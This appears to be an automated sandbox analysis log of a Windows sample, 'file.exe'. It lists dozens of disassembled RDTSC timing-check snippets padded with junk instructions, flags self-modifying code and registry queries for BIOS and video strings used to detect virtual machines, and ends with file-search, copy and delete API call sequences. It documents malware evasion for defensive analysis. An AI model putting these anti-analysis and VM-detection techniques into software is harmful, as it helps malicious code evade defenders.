                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518029 second address: 518040 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3D90F37F1Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518168 second address: 518185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B57h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518185 second address: 51819E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push esi 0x00000007 pushad 0x00000008 jmp 00007F3D90F37F1Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51831A second address: 518338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3D90D93B55h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518662 second address: 51866A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E122 second address: 51E147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3D90D93B46h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F3D90D93B54h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E147 second address: 51E161 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D90F37F18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F3D90F37F1Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E161 second address: 51E168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E9D1 second address: 51E9F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F3D90F37F18h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F3D90F37F1Ch 0x00000018 pop edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E9F6 second address: 51E9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51EF81 second address: 51EF95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F20h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51EF95 second address: 51EFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F231 second address: 51F236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F53F second address: 51F54B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D90D93B46h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FDEB second address: 51FE16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90F37F1Dh 0x00000008 jmp 00007F3D90F37F23h 0x0000000d jno 00007F3D90F37F16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FE16 second address: 51FE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F3D90D93B4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FE2E second address: 51FE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FE37 second address: 51FE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FE3D second address: 51FE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C8DB second address: 47C8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524390 second address: 5243B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F3D90F37F16h 0x00000011 jmp 00007F3D90F37F27h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5243B8 second address: 5243D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F3D90D93B46h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524523 second address: 524527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524800 second address: 52480F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F3D90D93B46h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524AE9 second address: 524AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3D90F37F16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524C66 second address: 524C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524C6A second address: 524C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52FE72 second address: 52FE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3D90D93B46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530004 second address: 530008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530008 second address: 530023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90D93B51h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530EC7 second address: 530F01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F21h 0x00000007 jmp 00007F3D90F37F1Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3D90F37F25h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538D41 second address: 538D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F3D90D93B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3D90D93B54h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F3D90D93B4Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538D6C second address: 538D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538D72 second address: 538D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5387B5 second address: 5387CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5438C5 second address: 5438C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 472571 second address: 47258F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Ch 0x00000009 jne 00007F3D90F37F1Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B95C second address: 54B962 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ABAD second address: 55ABB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ABB8 second address: 55ABBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ABBC second address: 55ABCC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3D90F37F16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ABCC second address: 55ABE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ABE8 second address: 55ABEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CAAA second address: 55CAAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CAAF second address: 55CAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CAB5 second address: 55CABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CABD second address: 55CACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3D90F37F1Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562087 second address: 56209A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Dh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56740B second address: 567415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3D90F37F16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5675AE second address: 5675B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5675B4 second address: 5675DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3D90F37F16h 0x0000000e jmp 00007F3D90F37F28h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5675DA second address: 5675DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56775D second address: 567761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5678EB second address: 5678F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5678F2 second address: 5678FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3D90F37F16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567BE9 second address: 567BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jno 00007F3D90D93B48h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567BFE second address: 567C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567C02 second address: 567C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568633 second address: 568654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90F37F27h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568654 second address: 568681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B59h 0x00000008 jmp 00007F3D90D93B4Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568681 second address: 56868A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56868A second address: 568690 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DB0C second address: 56DB10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DB10 second address: 56DB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57168E second address: 5716A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F3D90F37F1Fh 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5732A3 second address: 5732A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5730FB second address: 573123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F3D90F37F27h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F3D90F37F1Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C5D8 second address: 57C5DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C5DF second address: 57C610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3D90F37F20h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F3D90F37F22h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C610 second address: 57C616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C616 second address: 57C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CFE5 second address: 58CFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B52h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CFFB second address: 58D001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D001 second address: 58D045 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B57h 0x00000008 jmp 00007F3D90D93B53h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jp 00007F3D90D93B4Ch 0x00000016 pushad 0x00000017 jnl 00007F3D90D93B46h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CD6B second address: 58CD71 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD86 second address: 59BDA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F3D90D93B52h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CA85 second address: 59CA89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CBCA second address: 59CC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3D90D93B46h 0x0000000a ja 00007F3D90D93B52h 0x00000010 push edx 0x00000011 jmp 00007F3D90D93B58h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E4D8 second address: 59E4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F3D90F37F18h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E4E9 second address: 59E4FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0F44 second address: 5A0F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A1440 second address: 5A146C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D90D93B4Dh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A146C second address: 5A1470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A1470 second address: 5A14AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D90D93B4Bh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F3D90D93B59h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 js 00007F3D90D93B4Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A44FC second address: 5A4518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F3D90F37F18h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A4518 second address: 5A4539 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3D90D93B59h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A4539 second address: 5A453D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A617B second address: 5A6188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F3D90D93B46h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A6188 second address: 5A618C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A618C second address: 5A6192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A6192 second address: 5A61B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D90F37F29h 0x00000009 js 00007F3D90F37F16h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC043B second address: 4FC044A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC044A second address: 4FC04DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3D90F37F1Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F3D90F37F21h 0x00000017 and cx, 2D36h 0x0000001c jmp 00007F3D90F37F21h 0x00000021 popfd 0x00000022 mov ax, 4927h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 jmp 00007F3D90F37F28h 0x0000002e mov edi, ecx 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F3D90F37F23h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 30DD40 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 53ED53 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-37411)
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000340F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00021710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
